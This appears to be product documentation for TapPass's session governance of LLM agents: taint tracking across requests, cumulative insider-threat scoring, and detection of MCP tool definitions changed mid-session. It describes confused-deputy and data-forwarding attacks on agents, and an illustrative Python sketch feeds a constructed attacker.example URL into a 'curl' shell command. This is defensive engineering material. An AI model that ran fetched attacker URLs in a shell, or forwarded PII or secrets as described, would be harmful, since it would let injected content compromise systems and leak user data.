Session Governance
Session governance in TapPass covers three areas: session-scoped taint tracking, session-aware insider threat detection, and session tool integrity.
Session-Scoped Taint Tracking
Taint labels persist across requests within a session (30 min TTL). If request 1 introduces EXTERNAL data via fetch_url, and request 3 uses it in shell_exec, the taint violation is caught.
This is runtime toxic flow analysis: the CaMeL confused deputy attack, detected across multi-turn conversations.
| Scenario | Request 1 | Request 3 | Detection |
|---|---|---|---|
| Confused deputy | fetch_url returns attacker URL | LLM puts URL in shell_exec | taint_check (EXTERNAL → shell sink) |
| PII forwarding | query_db returns customer emails | LLM includes in send_email | taint_check (PII → network sink) |
| Secret relay | read_file returns API key | LLM echoes in response | taint_check (SECRET → output) |
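
A minimal sketch of session-scoped taint tracking as described above, added here as an illustration and not TapPass code. The tool-to-label mapping follows the scenario table; the `SessionTaint` class, the `response` sink name and propagation by exact substring match are assumptions.

```python
import time

TTL_SECONDS = 30 * 60  # session taint TTL stated on the page

# Assumed mapping of tools to the labels and sinks in the scenario table.
SOURCE_LABELS = {"fetch_url": "EXTERNAL", "query_db": "PII", "read_file": "SECRET"}
SINK_KINDS = {"shell_exec": "shell", "send_email": "network", "response": "output"}
FORBIDDEN = {("EXTERNAL", "shell"), ("PII", "network"), ("SECRET", "output")}


class SessionTaint:
    """Remembers labelled values per session so later requests can be checked."""

    def __init__(self, ttl=TTL_SECONDS, clock=time.monotonic):
        self.ttl, self.clock = ttl, clock
        self.sessions = {}  # session_id -> list of (value, label, recorded_at)

    def record_output(self, session_id, tool, values):
        """Label every non-empty value returned by a known source tool."""
        label = SOURCE_LABELS.get(tool)
        if label is None:
            return
        now = self.clock()
        entries = self.sessions.setdefault(session_id, [])
        entries.extend((v, label, now) for v in values if v)

    def taint_check(self, session_id, sink_tool, text):
        """Return sorted (label, sink_kind) violations for text sent to a sink."""
        kind = SINK_KINDS.get(sink_tool)
        now = self.clock()
        live = [e for e in self.sessions.get(session_id, []) if now - e[2] < self.ttl]
        self.sessions[session_id] = live  # drop labels older than the TTL
        hits = {(label, kind) for value, label, _ in live if value in text}
        return sorted(hits & FORBIDDEN)


def demo():
    """Constructed three-request session mirroring the confused-deputy row."""
    tracker = SessionTaint()
    url = "https://attacker.example/setup"  # constructed sample value
    tracker.record_output("sess-1", "fetch_url", [url])                   # request 1
    clean = tracker.taint_check("sess-1", "shell_exec", "ls -la")         # request 2
    flagged = tracker.taint_check("sess-1", "shell_exec", f"curl {url}")  # request 3
    return clean, flagged
```

Substring matching misses values the model rewrites or encodes, so treat it as the simplest possible propagation rule rather than a complete one.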
Session-Aware Insider Threat Detection
The detect_insider_threat step tracks behavior across an entire session, not just per-message. Cumulative risk compounds across threat categories with a 30-minute half-life decay.
| Category count | Compounding bonus |
|---|---|
| 2 categories in session | +15 risk |
| 3 categories in session | +25 risk |
| 4+ categories in session | +35 risk |
A session is blocked when cumulative risk reaches ≥80.
Session Tool Integrity
Tool definition hashes are stored from the first request in each session. Every subsequent request compares against the session baseline. If an MCP server changes tool definitions mid-conversation (after establishing trust), the change is detected and flagged as session_tool_rug_pull.
This runs independently from the registration-level tool integrity check.